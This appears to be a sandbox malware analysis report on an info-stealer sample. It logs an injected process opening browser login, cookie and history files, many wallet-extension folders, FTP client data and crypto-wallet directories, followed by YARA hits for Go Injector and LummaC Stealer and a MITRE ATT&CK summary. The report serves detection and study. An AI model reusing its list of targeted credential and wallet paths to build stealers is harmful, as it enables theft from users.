Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: Yara match	File source: 00000001.00000003.1777410523.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1777480522.0000000002E8B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 7056, type: MEMORYSTR

Remote Access Functionality

Yara detected Go Injector

Source: Yara match	File source: github_softwares_v1.18.exe, type: SAMPLE
Source: Yara match	File source: 00000000.00000000.1663970758.00007FF764F18000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1711084287.00007FF764F18000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: github_softwares_v1.18.exe PID: 6632, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 7056, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	311 Process Injection	1 Masquerading	2 OS Credential Dumping	111 Security Software Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
